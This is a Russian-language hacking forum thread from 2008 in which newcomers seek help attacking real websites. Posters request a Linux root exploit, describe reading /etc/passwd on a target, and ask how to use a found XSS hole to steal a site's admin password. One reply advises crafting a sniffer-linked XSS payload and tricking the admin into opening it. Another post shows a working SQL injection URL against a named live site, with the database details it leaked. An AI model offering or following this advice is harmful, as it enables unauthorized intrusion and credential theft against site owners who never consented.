ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
27.04.2008, 21:20
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Кто-небудь знает есть ли прога или скрипт для перебра лимита и сохранении результата??
|
|
|
28.04.2008, 01:28
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753
Репутация:
120
|
|
Сообщение от GOGA075
Кто-небудь знает есть ли прога или скрипт для перебра лимита и сохранении результата??
SQL Injection Pentesting TooL
|
|
|
|
27.04.2008, 21:45
|
|
Познающий
Регистрация: 07.03.2008
Сообщений: 41
Провел на форуме:
572900
Репутация:
17
|
|
Кому не сложно,киньте эксплойт для Linux 2.6.9 для получения root'a.
|
|
|
|
27.04.2008, 21:48
|
|
Познающий
Регистрация: 07.03.2008
Сообщений: 41
Провел на форуме:
572900
Репутация:
17
|
|
to На100ящий
Вот ссылка на оч.хорошую статью,посмотри там: https://forum.antichat.ru/thread49775.html
|
|
|
|
27.04.2008, 21:59
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223
Репутация:
5
|
|
to SQL~In[J]ecTi0n
Читал её уже, хорошая статья, но не выходит!!! /etc/passwd могу прочитать, а httpd.conf найти немогу. Подскажите путь...плз
|
|
|
|
28.04.2008, 09:44
|
|
Новичок
Регистрация: 03.10.2007
Сообщений: 5
Провел на форуме:
45623
Репутация:
0
|
|
Здравствуйте, прошу прощения за столь глупый вопрос, просто очень нужна помощь.
Суть такова, есть сайт на нем я нашел уязвимость XSS, когда вбиваешь в поля логина и пароля, <script>alert('xss')</script> браузер дружелюбнол выкидывает окошечко, всё как надо. Как мне применить эту уязвимость, в своих целях. Мне нужно стыбрить пароль от админки сайта.
|
|
|
|
28.04.2008, 10:17
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
m0rf, соц. инженерия. Берешь любой сниффер, перехватываешь запрос авторизации, потом составляешь xss'ку под сниффер вебовый и впариваешь её админу.
з.ы. если непонятно написал, стукни в пм или аську - объясню нормально)
|
|
|
|
28.04.2008, 17:39
|
|
Участник форума
Регистрация: 06.03.2007
Сообщений: 283
Провел на форуме:
1547094
Репутация:
120
|
|
Может ли мне кто небудь объяснить что делать с этим:
http://www.s3m.com/dma/displayuser.php?user_id=-1224+union+select+1,2,3,4,concat_ws(0x4,user(),dat abase(),version()),6,7,8,9,10,11,12,13,14,15--
user: s3mcom_preylude@localhost
db: s3mcom_main
version: 4.1.22-standard
Я понимаю что это версия и названия бызы данных, ну знаю я эти данные но вить пароля у меня нету! зачем эти инекции тогда?и в каких целях их применять?
Последний раз редактировалось xaker-boss; 28.04.2008 в 17:41..
|
|
|
|
28.04.2008, 17:48
|
|
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776
Репутация:
93
|
|
xaker-boss, инъекция как факт. Если она тебе интересна - раскручиваешь.
|
|
|
|
28.04.2008, 17:55
|
|
Участник форума
Регистрация: 06.03.2007
Сообщений: 283
Провел на форуме:
1547094
Репутация:
120
|
|
Смысле 'раскручиваешь' ? можно поподробней?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
![Аватар для SQL~In[J]ecTi0n](/avatars/avatar51654.jpg?668056){kind=avatar}
![Аватар для SQL~In[J]ecTi0n](/avatars/avatar51654.jpg?668063){kind=avatar}
Похожие темы
Комбинированный вид